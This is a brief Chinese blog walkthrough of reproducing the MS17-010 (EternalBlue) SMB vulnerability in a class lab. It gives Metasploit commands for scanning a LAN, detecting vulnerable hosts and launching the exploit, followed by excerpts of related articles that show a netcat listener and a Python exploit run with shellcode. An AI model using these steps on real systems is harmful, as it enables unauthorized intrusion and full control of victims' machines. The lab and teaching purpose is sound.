MS17 010 漏洞復現

2021-10-14 07:48:12 字數 728 閱讀 5792

開啟msf

msfconsole

fping -a -g 起始ip 結束ip (掃瞄當前區域網活躍ip)

fping -a -g 192.168.1.1 192.168.1.250

先輸入這條命令

gem install ruby_smb
然後,掃瞄內網有沒有ms17-010漏洞 

use auxiliary/scanner/smb/smb_ms17_010
結果會掃瞄出來內網存在ms17-010漏洞的內網ip
set rhosts  《存在漏洞的ip>

run看到綠色的就代表掃瞄出來的漏洞。

然後輸入這條命令,啟用這個模板

設定要掃瞄的ip

set rhost 192.168.0.101

exploit

ok

ms17 010漏洞復現

很老的洞了,只是老師上課講了,我就復現一遍。環境靶機為windows7並且存在此漏洞 攻擊機需要python3環境 nc lvp 8888 python ms17 010.py host 192.168.217.2 file shellcode 只需這兩條命令,便可以利用成功,其中ms17 010....

MS17 010漏洞復現

實驗環境 kali 虛擬機器 windows 7 x64 虛擬機器 1 檢視兩台機器的ip位址,且關閉win7防火牆 可見win7 ip為 192.168.15.129 kali 為 192.168.15.130 啟動 mdfconsole msfconsole 使用如下命令 第一句為利用auxil...

MS17 010(永恆之藍)漏洞復現

永恆之藍是2017年4月14日晚,黑客團體shadow brokers 影子經紀人 公布的一大批網路攻擊工具中的其中乙個。永恆之藍 利用windows系統的smb漏洞可以獲取系統最高許可權。5月12日,不法分子通過改造 永恆之藍 製作了wannacry勒索病毒。實驗一 獲取windows serve...